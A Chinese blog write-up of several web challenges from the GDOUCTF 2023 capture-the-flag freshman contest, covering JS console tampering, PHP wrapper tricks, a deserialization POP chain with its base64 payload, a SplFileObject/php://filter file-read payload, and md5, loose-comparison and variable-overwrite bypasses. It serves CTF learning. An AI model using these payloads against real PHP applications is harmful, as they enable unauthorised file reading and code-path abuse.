NSSCTF-GDOUCTF 2023新生赛

已于 2024-07-31 11:20:15 修改
阅读量478 收藏 15
点赞数 20
分类专栏: CTF知识及赛题 文章标签: 网络 网络协议 网络安全
于 2024-07-31 11:19:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_78903258/article/details/140813833
版权

[GDOUCTF 2023]hate eat snake

考察:js代码审计

打开题目,发现需要坚持60秒,那么简单的一个思路就是修改得分的变量>60即可

办法1:修改变量

右键查看源代码,之后发现有一个snake.js的文件,ctrl+f搜索if,发现判断过关的条件是getScore>60

搜索发现getScore在Snake.prototype

在控制台执行
payload

Snake.prototype.getScore = () => 61

控制台开始调用函数
在游戏界面再按一下空格,得到flag

方法2: 先玩游,得到分数后在放着界面停留60秒,再按空格,获取flag

[GDOUCTF 2023]泄露的伪装

考察:目录扫描,php伪协议

由于环境打不开了,我就根据别人的wp提供下思路

思路:打开题目---->>>目录扫描(rar文件下载)--->>>代码审计--->>>php伪协议(input,data)

get参数为?cxk=php://input
post参数为ctrl

或者使用下面一种 

?cxk=data://text/plain,ctrl

[GDOUCTF 2023]反方向的钟 

考察:反序列化,原生类SplFileObject

打开题目,发现一大串代码,看到类了,猜测考察反序列化,需要构造poc链

<?php
error_reporting(0);
highlight_file(__FILE__);
// flag.php
class teacher{
    public $name;
    public $rank;
    private $salary;
    public function __construct($name,$rank,$salary = 10000){
        $this->name = $name;
        $this->rank = $rank;
        $this->salary = $salary;
    }
}

class classroom{
    public $name;
    public $leader;
    public function __construct($name,$leader){
        $this->name = $name;
        $this->leader = $leader;
    }
    public function hahaha(){
        if($this->name != 'one class' or $this->leader->name != 'ing' or $this->leader->rank !='department'){
            return False;
        }
        else{
            return True;
        }
    }
}

class school{
    public $department;
    public $headmaster;
    public function __construct($department,$ceo){
        $this->department = $department;
        $this->headmaster = $ceo;
    }
    public function IPO(){
        if($this->headmaster == 'ong'){
            echo "Pretty Good ! Ctfer!\n";
            echo new $_POST['a']($_POST['b']);
        }
    }
    public function __wakeup(){
        if($this->department->hahaha()) {
            $this->IPO();
        }
    }
}

if(isset($_GET['d'])){
    unserialize(base64_decode($_GET['d']));
}
?>

分析

能利用原生类SplFileObject读取文件

找到最核心的IPO(),关键点new $_POST[‘a’] ($_POST[‘b’])

可以POST请求利用原生类读取文件获得flag(base64编码)

步骤

要执行IPO(),看到__wakeup()下,要先执行hahaha()

再找到hahaha()所在的类为classroom,要使返回为真,三个变量赋值得为对应的值,leader指向name和rank的值,也就说明$leader=new teacher(),发现name和rank是在teacher类那里

构造poc链

<?php
class teacher{
    public $name='ing';
    public $rank='department';
    private $salary;
}

class classroom{
    public $name='one class';
    public $leader; 
}

class school{
    public $department;
    public $headmaster='ong';   
}


$a=new school();
$a->department=new classroom();
$a->department->leader=new teacher();
echo base64_encode(serialize($a));

Tzo2OiJzY2hvb2wiOjI6e3M6MTA6ImRlcGFydG1lbnQiO086OToiY2xhc3Nyb29tIjoyOntzOjQ6Im5hbWUiO3M6OToib25lIGNsYXNzIjtzOjY6ImxlYWRlciI7Tzo3OiJ0ZWFjaGVyIjozOntzOjQ6Im5hbWUiO3M6MzoiaW5nIjtzOjQ6InJhbmsiO3M6MTA6ImRlcGFydG1lbnQiO3M6MTU6IgB0ZWFjaGVyAHNhbGFyeSI7aToxMDAwMDt9fXM6MTA6ImhlYWRtYXN0ZXIiO3M6Mzoib25nIjt9

之后利用原生类SplFileObject读取文件

a为类,b用php协议读取flag.php   /代码中说了flag在flag.php中

所以POST的payload为:

a=SplFileObject&b=php://filter/read=convert.base64-encode/resource=flag.php

 进行访问

得到base64编码,我们再进行解码得到flag

<?php
$flag = "NSSCTF{c18adac3-acf0-4efa-ab63-10279c78c08d}";
?>

[GDOUCTF 2023]受不了一点

考察:md5绕过,强/弱类型比较,变量覆盖

打开题目,得到源码

 <?php
error_reporting(0);
header("Content-type:text/html;charset=utf-8");
if(isset($_POST['gdou'])&&isset($_POST['ctf'])){
    $b=$_POST['ctf'];
    $a=$_POST['gdou'];
    if($_POST['gdou']!=$_POST['ctf'] && md5($a)===md5($b)){
        if(isset($_COOKIE['cookie'])){
           if ($_COOKIE['cookie']=='j0k3r'){
               if(isset($_GET['aaa']) && isset($_GET['bbb'])){
                  $aaa=$_GET['aaa'];
                  $bbb=$_GET['bbb'];
                 if($aaa==114514 && $bbb==114514 && $aaa!=$bbb){
                   $give = 'cancanwordflag';
                   $get ='hacker!';
                   if(isset($_GET['flag']) && isset($_POST['flag'])){
                         die($give);
                    }
                   if($_POST['flag'] === 'flag' || $_GET['flag'] === 'flag'){
                       die($get);
                    }
                    foreach ($_POST as $key => $value) {
                        $$key = $value;
                   }
                    foreach ($_GET as $key => $value) {
                         $$key = $$value;
                    }
                   echo $flag;
            }else{
                  echo "洗洗睡吧";
                 }
    }else{
        echo "行不行啊细狗";
        }
  }
}
else {
  echo '菜菜';
}
}else{
  echo "就这?";
}
}else{
  echo "别来沾边";
}
?>
别来沾边

初步分析,我们需要进行四组绕过 

if($_POST['gdou']!=$_POST['ctf'] && md5($a)===md5($b))

这里我们需要进行md5绕过,并且为强类型比较绕过,我们可以考虑用数组绕过,也可以用md5碰撞进行绕过

md5()函数无法处理数组,如果传入的为数组,会返回NULL,所以两个数组经过加密后得到的都是NULL,也就是相等的。  例如 a[]=1&b[]=2

gdou[]=1&ctf[]=2
//绕过第一步

这里为简单的cookie赋值,我们用火狐浏览器的hackbar插件就能修改cookie的值 

if ($_COOKIE['cookie']=='j0k3r'

这里为弱比较类型的绕过,我们可以用小数点进行绕过 ,也可以后面加字符进行绕过

if($aaa==114514 && $bbb==114514 && $aaa!=$bbb

 构造payload

aaa=114514&bbb=114514.a

 接着下面这里考察的是变量覆盖

if($_POST['flag'] === 'flag' || $_GET['flag'] === 'flag'){
                       die($get);
                    }
                    foreach ($_POST as $key => $value) {
                        $$key = $value;
                   }
                    foreach ($_GET as $key => $value) {
                         $$key = $$value;
                    }
                   echo $flag;

 直接构造payload,变色的变量可以改变,但与后面的需要相同

123=flag&flag=123

最后抓包构造所有的payload

POST /?aaa=114514&bbb=114514a&123=flag&flag=123

post参数

gdou[]=1&ctf[]=2

 [GDOUCTF 2023]EZ WEB

考察:http协议

由于环境开启不了,看了下别人的wp,讲讲思路

思路:右键查看网页源代码--->>>访问有关于flag的路由--->>>BP抓包修改请求方式为POST

Paranoid144
关注
  • 20
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[SWPUCTF 2021 新生]traditional
03-15
在 SWPUCTF 2021 新生的传统题目中,我们看到了一道有趣的密码题目,它与八卦图和二进制数学有着紧密的联系。莱布尼茨是西方的二进制数学的发明者,他受到中国的八卦图的启发,演绎并推论出了数学矩阵,最后创造了...
nssctf文件test
03-30
1
GDOUCTF2023 Crypto Pwn
qq_41626232的博客
04-16 543
用的蠢方法做的,发现x为52位时可以使用small_roots,(这个很好找到上界,没考虑epsilon参数)然后简单爆破2^12=4096解空间。这个用ctypes库加载libc文件,然后随机数就一模一样了,没见过的话,可以看一看,感觉很好用。参数的默认值为0.05,该默认参数下的bound不足以解出本题的小整数解,根据。我做的时候忘记看题目名字了,溢出大小还行,用常规的ret2libc做的。我直接把fake的base64密文全删了,然后就给了一个压缩包出来了。这不是misc题吗?
NSSCTF-Web题目16
weixin_54055099的博客
06-25 669
PHP代码审计,数组绕过、弱比较,apache解析漏洞
NSSCTF中的Vim yyds、Interesting_include、[HUBUCTF 2022 新生]checkin、EZ WEB、泄露的伪装、hate eat snake、ez_ez_php
2401_82388450的博客
05-21 762
1.复习了vim缓存文件的解题方法2.学习到了true和非空、非零字符串比较都是为true,了解到了php弱比较的一种解题方式3.了解到了Flask 框架以及在bp中发送PUT请求。
[SWPUCTF 2022 新生]奇妙的MD5... ...
2401_82985722的博客
05-28 900
第三层:GET传参?第一层:POST传参 gdou[]=1&ctf[]=2,(===强比较,[]数组绕过)字符串的弱比较,可以用114514a(字符串)来绕过,解析后仍为114514(整型)F12查看源码,在/dist/index.umd.js中发现一个关于flag的路径。输入想要获取的数据库名称,使用万能密码1’ or ‘1’=’1爆破。二者值不相等,但MD5加密后相等,===强比较 使用[]绕过。第四层:flag传入空值 flag= ,返回。==弱比较,使用0e、[]数组绕过都可以。
NSSCTF逆向刷题记录
fivesheeptree的博客
07-18 2105
得到第一位字符"N"以及flag的长度为35arr数组的长度只有34,故将i的范围改为34s = ['N']
NSSCTF web题记录
m0_64815693的博客
11-08 1万+
[GXYCTF 2019]BabyUpload [GKCTF 2020]CheckIN [NISACTF 2022]babyserialize [NISACTF 2022]popchains [NSSRound#4 SWPU]1zweb prize_p1 prize_p5 [NISACTF 2022]middlerce [SWPUCTF 2021 新生]babyunser [TQLCTF 2022]simple_bypass
NSSCTF reverse题目解析(详细版)持续更新
ZJPC007的博客
11-24 2811
附件是一个.py文件原代码的含义是将list[]数组进行操作得到一个key利用key和flag进行异或操作,得到16进制的result所以可以得到大致的逆向代码框架重点就是对以下语句进行逆向该语句的含义是keyhex()[2:]zfill(2)因此的到逆向语句这里要注意的就是16进制和字符间的转换int(string,16)的功能就是将16进制转为10进制因此得到完整的脚本。
CTF-PWN学习-为缺少指导的同学而生
热门推荐
yuwoxinanA3的博客
05-11 1万+
入门PWN不可能无痛,但尽量会减轻大家的痛苦,怎么说呢,就像博主在你们前面一步的位置,帮你们挡着一点风浪前进。
NSSCTF之Web篇刷题记录(12)
Aluxian_的博客
05-23 1648
【代码】NSSCTF之Web篇刷题记录(12)
vm虚拟机-简单题目(hgame-week4-easyvm、cg-ctf wxyVM1/2
01-08
vm 比较经典的虚拟机的题目是南邮的cg-ctf的题目, 然后先写了前面的cg-ctf的两个题目,其实当时做的时候还没太大虚拟机的感觉,后面接触到hgame的题目,然后再看的时候就感觉到有些那个意思,但是两个题目是基础...
apachecn#apachecn-ctf-wiki#CTF-AWD靶场搭建和第一题题解_星星明亮的博客-CSDN博客_awd靶
07-25
1.根据当前队伍数量copy所有的队伍的比文件夹: 2.启动比: 1.每个队伍分配到一个docker主机,给定ctf用户权限,通过制定的端口和密码进行连接
Linux网络工具“瑞士军刀“集合
分享不一样的技术,与你一起共同成长!
07-26 359
下面结合之前的一些使用经验为大家介绍一下一些经典应用场景下,这个网络命令工具如何使用的。例如怎么查看当前服务器监听哪些端口、连接目标主机端口情况如何?平常我们在进行Linux服务器相关运维的时候,总会遇到一些网络相关的问题。我们可以借助这些小巧、功能强悍的工具帮助我们排查问题、解决问题...
计算机网络—电路、分组、报文交换—图文详解
最新发布
喻师傅的学习笔记
07-31 376
计算机网络—三种交换方式图文详解
linux操作系统_TCP
hkhkhkhkh123的博客
07-30 663
1)三次握手和四次挥手机制 2) 确认应答:TCP将每个字节的数据都进行了编号,即为序列号。每一个ACK都带有对应的确认序列号,保证数据不丢失的按序到达 3)超时重传:当发送端发送的数据在网络中丢失时,在一定时间内没有收到接收端的ACK,则发送端会重新发送丢失数据。2. ACK: 确认应答标志 3. PSH: 表示发送数据,提示接收端从TCP接收缓冲区中读走数据,为接收后续数据腾出空间 4. RST: 重置连接标志 5. SYN: 表示请求建立一个连接 6. FIN: finish标志, 表示释放连接。
网络安全在2024好入行吗?
2401_84466225的博客
07-29 509
024年的今天,慎重进入网安行业吧,目前来说信息安全方向的就业对于学历的容忍度比软件开发要大得多,还有很多高中被挖过来的大佬。
S5730举例
jjjxxxhhh123的博客
07-27 968
例子: 假设在校园网络中,某些交换机之间存在多个连接(可能是多个光纤),如果没有STP,这些多个连接可能导致数据包在网络中无限制地传输,形成网络风暴,导致整个网络瘫痪。PIM-SM通过仅在需要时在网络中传输组播数据包,减少网络带宽的占用,提高数据传输效率。[sysname-GigabitEthernet0/0/1] ospf cost 10 // 设置接口的OSPF成本,影响路径选择。综上所述,这些网络技术和配置在大学校园网络中起到关键作用,确保网络运行高效、安全和可靠,同时满足用户的多样化需求。
nssctf的jwt问3
08-17
首先将图像的背景填充为白色。 2. 在保存图片时,使用 `ImageIO.write()` 方法将二维码图像保存为 PNG 格式的图片文件。 3. 请确保您已经导入 `java.awt.image抱歉,我无法回答有关 nssctf 的问题。我是一个与开发者有关的 AI,.BufferedImage` 和 `javax.imageio.ImageIO` 类。 您可以根据需要修改保存图片的路径和文件名。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值